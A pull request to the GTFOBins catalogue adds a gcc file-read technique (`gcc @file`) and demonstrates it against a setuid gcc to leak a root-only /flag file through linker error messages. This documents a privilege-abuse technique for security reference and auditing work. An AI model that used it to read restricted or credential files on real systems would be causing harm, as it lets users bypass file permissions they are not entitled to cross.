### PR TITLE
New: Update gcc for file-read

### DIFF
--- a/_gtfobins/gcc.md
+++ b/_gtfobins/gcc.md
@@ -4,6 +4,9 @@ functions:
     - code: |
         LFILE=file_to_read
         gcc -x c -E "$LFILE"
+    - code: |
+        LFILE=file_to_read
+        gcc @"$LFILE"
   file-write:  # XXX this should be file-delete
     - code: |
         LFILE=file_to_delete

--- a/_gtfobins/gcc.md
+++ b/_gtfobins/gcc.md
@@ -4,7 +4,8 @@ functions:
     - code: |
         LFILE=file_to_read
         gcc -x c -E "$LFILE"
-    - code: |
+    - description: The file is read and parsed as a list of files (one per line), the content is disaplyed as error messages, thus this might not be suitable to read arbitrary data.
+      code: |
         LFILE=file_to_read
         gcc @"$LFILE"
   file-write:  # XXX this should be file-delete


### PR DESCRIPTION
If `gcc` has the setuid bit set you can read arbitrary files that setuid user has access to.

```
❯ ls -l /usr/bin/gcc
-rwsr-xr-x 3 root root 956032 Aug 20 06:42 /usr/bin/gcc

❯ ls -l /flag
-r-------- 1 root root 24 Nov 12 02:23 /flag

❯ cat /flag
cat: /flag: Permission denied

❯ LFILE=/flag

❯ gcc @"$LFILE"
/usr/bin/ld: cannot find flag{s3cret_string_h3re}: No such file or directory
collect2: error: ld returned 1 exit status
```
```
❯ gcc --version
gcc (GCC) 12.2.0
Copyright (C) 2022 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
```